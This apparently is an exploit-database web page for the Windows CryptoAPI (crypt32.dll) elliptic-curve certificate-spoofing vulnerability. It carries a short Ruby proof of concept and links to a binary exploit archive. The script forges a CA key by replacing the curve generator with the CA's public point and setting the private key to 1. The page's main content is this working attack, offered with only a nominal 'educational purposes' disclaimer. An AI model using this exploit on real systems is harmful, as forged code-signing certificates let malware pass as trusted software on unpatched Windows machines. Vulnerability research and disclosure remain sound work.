Microsoft windows cryptoapi (crypt32.dll) elliptic curve cryptography (ecc) spoof codesigning certificate Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2020-01-15 | Type : local | Platform : windows
This exploit / vulnerability Microsoft windows cryptoapi (crypt32.dll) elliptic curve cryptography (ecc) spoof codesigning certificate is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47933.zip

require 'openssl'

raw = File.read "ca.crt"
ca_cert = OpenSSL::X509::Certificate.new(raw)

# Parse public key from CA
ca_key = ca_cert.public_key
if !(ca_key.instance_of? OpenSSL::PKey::EC) then
puts "CA NOT ECC"
puts "Type: " + key.inspect
exit
end

# Set new group with fake generator G = Q
ca_key.private_key = 1
group = ca_key.group
group.set_generator(ca_key.public_key, group.order, group.cofactor)
group.asn1_flag = OpenSSL::PKey::EC::EXPLICIT_CURVE
ca_key.group = group

puts ca_key.to_pem

Microsoft windows cryptoapi (crypt32.dll) elliptic curve cryptography (ecc) spoof codesigning certificate


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Microsoft windows cryptoapi (crypt32.dll) elliptic curve cryptography (ecc) spoof codesigning certificate Vulnerability / Exploit